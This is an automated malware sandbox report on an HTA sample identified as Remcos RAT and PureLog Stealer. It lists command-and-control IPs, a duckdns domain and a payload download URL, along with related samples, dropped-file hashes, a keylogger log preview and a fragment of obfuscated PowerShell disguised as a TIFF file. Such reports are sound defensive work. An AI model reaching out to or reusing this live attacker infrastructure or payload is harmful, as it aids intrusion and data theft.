                          http://104.168.32.148powershell.exe, 00000009.00000002.2256807258.00000000051E8000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.2256807258.0000000005077000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://geoplugin.net/json.gpRegAsm.exefalse
                          • URL Reputation: safe
                          		unknown
                          http://104.168.32.148/powershell.exe, 00000003.00000002.2177473162.0000000008B49000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crl.micropowershell.exe, 00000003.00000002.2177473162.0000000008B0D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2290069028.000000000318F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2253530010.0000000000F47000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://geoplugin.net/json.gp/Cpowershell.exe, 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2263876284.0000000006395000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.4499091602.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.2169309335.0000000005451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2292037286.0000000005178000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2292037286.0000000005169000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2256807258.0000000004F21000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://104.168.32.148/345/nicemeetingsofpictureclearthingstobe.tIFLpowershell.exe, 00000003.00000002.2175493809.0000000007C21000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.2169309335.00000000055A7000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://contoso.com/powershell.exe, 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.2171736688.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2263876284.0000000005F8B000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://ia600100.us.archive.orgpowershell.exe, 00000009.00000002.2256807258.0000000005321000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2256807258.0000000005077000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.2169309335.0000000005451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2292037286.0000000005155000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2256807258.0000000004F21000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://ia600100.us.archive.orgpowershell.exe, 00000009.00000002.2256807258.000000000536C000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          104.168.32.148
                          		unknownUnited States
                          		36352AS-COLOCROSSINGUStrue
                          45.134.140.70
                          		ramcxx.duckdns.orgGeorgia
                          		197328INETLTDTRtrue
                          207.241.227.240
                          		ia600100.us.archive.orgUnited States
                          		7941INTERNET-ARCHIVEUSfalse

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1518499
                          Start date and time:2024-09-25 18:49:07 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 9m 13s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:14
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:LJ1IZDkHyE.hta
                          renamed because original name is a hash value
                          Original Sample Name:d6a04e7ba31d063b7176e3f9fc96c46a.hta
                          Detection:MAL
                          Classification:mal100.rans.troj.spyw.expl.evad.winHTA@19/18@6/3
                          EGA Information:
                          • Successful, ratio: 60%
                          HCA Information:
                          • Successful, ratio: 99%
                          • Number of executed functions: 82
                          • Number of non-executed functions: 195
                          Cookbook Comments:
                          • Found application associated with file extension: .hta
                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                          Warnings

                          • Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • Execution Graph export aborted for target mshta.exe, PID 5508 because there are no executed function
                          • Execution Graph export aborted for target powershell.exe, PID 6128 because it is empty
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • VT rate limit hit for: LJ1IZDkHyE.hta

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          12:50:00API Interceptor89x Sleep call for process: powershell.exe modified
                          12:50:50API Interceptor6359612x Sleep call for process: RegAsm.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          104.168.32.148BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                          • 104.168.32.148/345/CHPPZA.txt
                          45.134.140.70BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                            207.241.227.240hnvc.vbsGet hashmaliciousPureLog StealerBrowse
                              wm.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                                TM3utH2CsU.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                  BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                    Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                      1zbL83sqmd.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                        AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                          Order draft.vbsGet hashmaliciousAzorult, PureLog StealerBrowse
                                            SPEC.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                              US0914424A.xla.xlsxGet hashmaliciousRemcos, PureLog StealerBrowse

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                ramcxx.duckdns.orgBL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • 45.134.140.70
                                                ia600100.us.archive.orghnvc.vbsGet hashmaliciousPureLog StealerBrowse
                                                • 207.241.227.240
                                                wm.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                                                • 207.241.227.240
                                                BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • 207.241.227.240
                                                Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • 207.241.227.240
                                                1zbL83sqmd.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • 207.241.227.240
                                                AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • 207.241.227.240
                                                Order draft.vbsGet hashmaliciousAzorult, PureLog StealerBrowse
                                                • 207.241.227.240
                                                SPEC.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • 207.241.227.240
                                                US0914424A.xla.xlsxGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • 207.241.227.240
                                                IEnetbookCookies.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                                                • 207.241.227.240

                                                ASNs

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                INTERNET-ARCHIVEUShnvc.vbsGet hashmaliciousPureLog StealerBrowse
                                                • 207.241.227.240
                                                wm.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                                                • 207.241.227.240
                                                TM3utH2CsU.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                • 207.241.227.240
                                                BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • 207.241.227.240
                                                Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • 207.241.227.240
                                                1zbL83sqmd.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • 207.241.227.240
                                                AWS 1301241710.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • 207.241.227.240
                                                Order draft.vbsGet hashmaliciousAzorult, PureLog StealerBrowse
                                                • 207.241.227.240
                                                SPEC.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • 207.241.227.240
                                                US0914424A.xla.xlsxGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • 207.241.227.240
                                                INETLTDTRBL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • 45.134.140.70
                                                file.exeGet hashmaliciousUnknownBrowse
                                                • 5.104.75.170
                                                file.exeGet hashmaliciousUnknownBrowse
                                                • 5.104.75.170
                                                file_5822aee2333945a68f99cf2cfdd0e024_2024-09-16_14_28_33_034000.zipGet hashmaliciousUnknownBrowse
                                                • 84.252.92.10
                                                Google%20Chrome1.exeGet hashmaliciousUnknownBrowse
                                                • 89.22.236.120
                                                Chrome.exeGet hashmaliciousUnknownBrowse
                                                • 89.22.236.120
                                                LEK1JCI81P.exeGet hashmaliciousRedLine, Snake Keylogger, StormKitty, SugarDump, VIP Keylogger, XWormBrowse
                                                • 91.92.120.13
                                                sVfXReO3QI.exeGet hashmaliciousUnknownBrowse
                                                • 45.128.38.162
                                                ExeFile (305).exeGet hashmaliciousEmotetBrowse
                                                • 178.211.45.66
                                                ExeFile (394).exeGet hashmaliciousEmotetBrowse
                                                • 178.211.45.66
                                                AS-COLOCROSSINGUSDHL Receipt_AWB811070484778.xlsGet hashmaliciousUnknownBrowse
                                                • 192.3.220.20
                                                DHL Receipt_AWB811070484778.xlsGet hashmaliciousUnknownBrowse
                                                • 192.3.220.20
                                                SDWLLRJcsY.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                • 107.173.4.16
                                                BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • 104.168.32.148
                                                Fwo62RjOqH.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • 192.210.150.29
                                                1zbL83sqmd.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                • 192.3.146.145
                                                K0hpP6V2fo.rtfGet hashmaliciousDBatLoader, RemcosBrowse
                                                • 107.175.243.142
                                                C8G355qROx.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                • 107.175.113.252
                                                RFQ-948563836483638563735435376354.xlsGet hashmaliciousRemcos, GuLoaderBrowse
                                                • 107.173.4.16
                                                xNfDl1NeaI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                • 107.173.4.16

                                                JA3 Fingerprints

                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                3b5074b1b5d032e5620f69f9f700ff0eConfirmaci#U00f3n de pago_shrunk.exeGet hashmaliciousAgentTeslaBrowse
                                                • 207.241.227.240
                                                SecuriteInfo.com.W32.Autoit.AOY.gen.Eldorado.13807.19631.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                • 207.241.227.240
                                                SecuriteInfo.com.Win32.MalwareX-gen.14926.30373.exeGet hashmaliciousMicroClipBrowse
                                                • 207.241.227.240
                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                • 207.241.227.240
                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                • 207.241.227.240
                                                https://osoulksa.com/c/FidelitymeGet hashmaliciousHTMLPhisherBrowse
                                                • 207.241.227.240
                                                http://rkanet.comGet hashmaliciousUnknownBrowse
                                                • 207.241.227.240
                                                NTGcon.msiGet hashmaliciousUnknownBrowse
                                                • 207.241.227.240
                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                • 207.241.227.240
                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                • 207.241.227.240

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\ProgramData\remcos\logs.dat

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):144
                                                Entropy (8bit):3.379519383183141
                                                Encrypted:false
                                                SSDEEP:3:rhlKlRlBfKlnWi5JWRal2Jl+7R0DAlBG45klovDl6v:6l1Cl15YcIeeDAlOWAv
                                                MD5:4C076563C2368A3C5D5C4B579D225744
                                                SHA1:275F0A1998C122D6643AE9CBCA1BCA0DE2797F46
                                                SHA-256:197F83C2C73640E41F73B2F5E88615FAA7EA5ADC023715481D62796D14C71C67
                                                SHA-512:04D2B3FB390394459EB5A58CA280C9EA745851512E548A4445E8D2441FAA6018A6D5EC39D0DA64C5C1073D6674F9A62CE1784BDF218847A8926C557CE2E5792F
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                Preview:....[.2.0.2.4./.0.9./.2.5. .1.2.:.5.0.:.1.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nicemeetingsofpictureclearthingstobe[1].tiff

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):260242
                                                Entropy (8bit):3.765032305777867
                                                Encrypted:false
                                                SSDEEP:3072:LwUs2qx9vFgTOuYTLaGHcntHONrLgt5psGwH7Hkyb9qGjK6Heo7sQ5CoBAlbjZft:MUgvFgTfYiGHs2/2Gj+ULIoSVZ+zO
                                                MD5:10A145CB87654A33C6C0BEDA947466B8
                                                SHA1:A504192F1B5AC44E6E49B4BC9EF660220C604469
                                                SHA-256:80E7C85EEB0A57E9F50E7D84E0EB1B2F2230837B53080D24696FAB7373E9BC03
                                                SHA-512:FBC4F71668B7AF09338AE7060C04DD8FEED091B3B7ADB490647C92D731CEFCA4B1E929D36F750563FF0AFA14B797984625EAF964F25A3F71B597343D79EC891A
                                                Malicious:false
                                                Preview:..........f.G.U.W.L.a.C.k.k.R.k.W.c.W.a.l.K.J.z.c.K.L.t.L.z. .=. .".d.T.b.A.p.U.N.c.K.A.p.S.K.L.f.U.H.z.K.b.f.c.o.U.l.".....L.P.B.n.c.L.i.u.e.G.e.k.q.T.c.a.n.t.i.s.s.o.c.i.a.l.i.s.t.a.L.P.p.O.B.P.h.e. .=. .".K.z.l.A.Q.S.K.q.Z.m.e.L.p.t.a.c.a.e.e.A.W.u.o.o.i.".....W.b.b.u.W.h.z.U.c.L.i.G.z.v.Q.p.P.G.O.o.J.c.U.r.U. .=. .".L.P.Z.K.i.q.A.L.i.Z.t.P.P.U.U.O.i.i.h.p.t.R.c.d.G.".....p.v.K.Z.o.J.o.H.l.m.m.K.g.p.G.H.e.G.H.Z.z.n.K.L.i. .=. .".a.d.l.W.v.L.P.p.j.Z.R.W.e.k.q.U.W.e.Z.a.N.G.t.A.L.".....B.i.U.z.J.L.L.J.W.b.p.C.Z.L.p.i.R.e.H.s.b.N.W.O.Z. .=. .".R.p.a.L.k.G.N.W.Q.k.W.z.L.W.W.g.W.L.p.x.u.d.G.L.c.".....e.G.g.z.N.t.o.i.W.u.W.f.B.k.c.z.c.m.u.q.Z.j.H.i.g. .=. .".Q.i.e.L.L.A.p.L.L.K.W.b.K.f.f.R.L.L.O.Z.z.B.h.W.i.".....P.W.K.c.c.U.m.c.m.Z.j.f.u.d.n.e.c.P.U.W.W.R.v.f.L. .=. .".l.U.O.P.r.G.C.v.i.K.N.e.i.f.i.t.W.A.I.t.K.Z.Z.k.L.".....a.S.i.z.W.P.O.Q.j.e.p.q.h.h.f.l.Z.b.G.O.s.c.p.A.p. .=. .".L.s.P.K.G.P.N.c.T.U.L.G.k.i.k.m.q.f.o.g.L.o.W.L.O.".....L.b.n.m.I.g.L.A.P.z.J.U.h.R.i.Z.v.K.P.e.i.N.i.K.s. .

                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):64
                                                Entropy (8bit):1.1628158735648508
                                                Encrypted:false
                                                SSDEEP:3:NlllulF//lz:NllU
                                                MD5:795BE6536C807E7B352D2B7A3A42EC19
                                                SHA1:DE9DB41949439FAA0A71910DFB199802DB89A9C4
                                                SHA-256:73940D9FF98EB0D3125D12893A4D2AEBDA218FE74F2AB528CDBE2B3BEF5A56EC
                                                SHA-512:EADAC6DB54621D7ECB0C7086C6321B39D97F49D4AEDA6253190EDF39F2A55F83C294BAC97BDF2DFA1B901DCB648EE0FDF2C3379FA44A593F1BBE4AD5DB5BCBFE
                                                Malicious:false
                                                Preview:@...e................................................@..........

                                                C:\Users\user\AppData\Local\Temp\RES9FA0.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols, created Wed Sep 25 18:26:38 2024, 1st section name ".debug$S"
                                                Category:dropped
                                                Size (bytes):1332
                                                Entropy (8bit):3.976361557496998
                                                Encrypted:false
                                                SSDEEP:24:HpzW916uZHPwKTFexmfwI+ycuZhN7GakS6XPNnqS2d:584KTAxmo1ul7Ga36FqSG
                                                MD5:A48B039C4F485CE714534ED43C871C20
                                                SHA1:75C7E16E28437EA08654968106F952A4B5598A7C
                                                SHA-256:DCD61E0AF07048F541986D66E6C9F4BDDD55A5BFF18C347BC86F031957563A8F
                                                SHA-512:6401D186FE021265A1BC1F002B54CBEF2D34647384774E85D466C442B4F3130ED792605D06A104703B1EAD55D11BAB024B7AE3C05DF3B0595ED17A854EDB4E7E
                                                Malicious:false
                                                Preview:L....U.f.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\rfrvbpim\CSCF3108577CD134F5DA2E7D7F2BD5C877.TMP................#S...$...\..............5.......C:\Users\user\AppData\Local\Temp\RES9FA0.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...r.f.r.v.b.p.i.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3avg21oj.lby.ps1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avhm3mxt.kyo.ps1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hwcckyoy.geo.psm1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jglgku3t.ix2.psm1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jshrsksj.riy.ps1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l2e2crop.3g1.psm1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ooaobhj5.cfc.ps1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qu2krlml.ehe.psm1

                                                Download File
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                C:\Users\user\AppData\Local\Temp\rfrvbpim\CSCF3108577CD134F5DA2E7D7F2BD5C877.TMP

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                File Type:MSVC .res
                                                Category:dropped
                                                Size (bytes):652
                                                Entropy (8bit):3.086479743002541
                                                Encrypted:false
                                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryBGak7Ynqq6XPN5Dlq5J:+RI+ycuZhN7GakS6XPNnqX
                                                MD5:EDAB2353B7EFC12415931D5CDFD614AC
                                                SHA1:52A94193F3369251D5ADA83A6F445D5F842C50A9
                                                SHA-256:5110771526C40D0DA5237711E6D6309E8ABDDAC086A4914B9A4079CC15CE1009
                                                SHA-512:D0BCDBA73BA80940AD81DCF0B38ACC3E7E792D0825D75A84EE8A1274B005BF2442A94AC4680D37510444805AB8D565EDFBA3DA487A5B1459B249DBD7651D8BB0
                                                Malicious:false
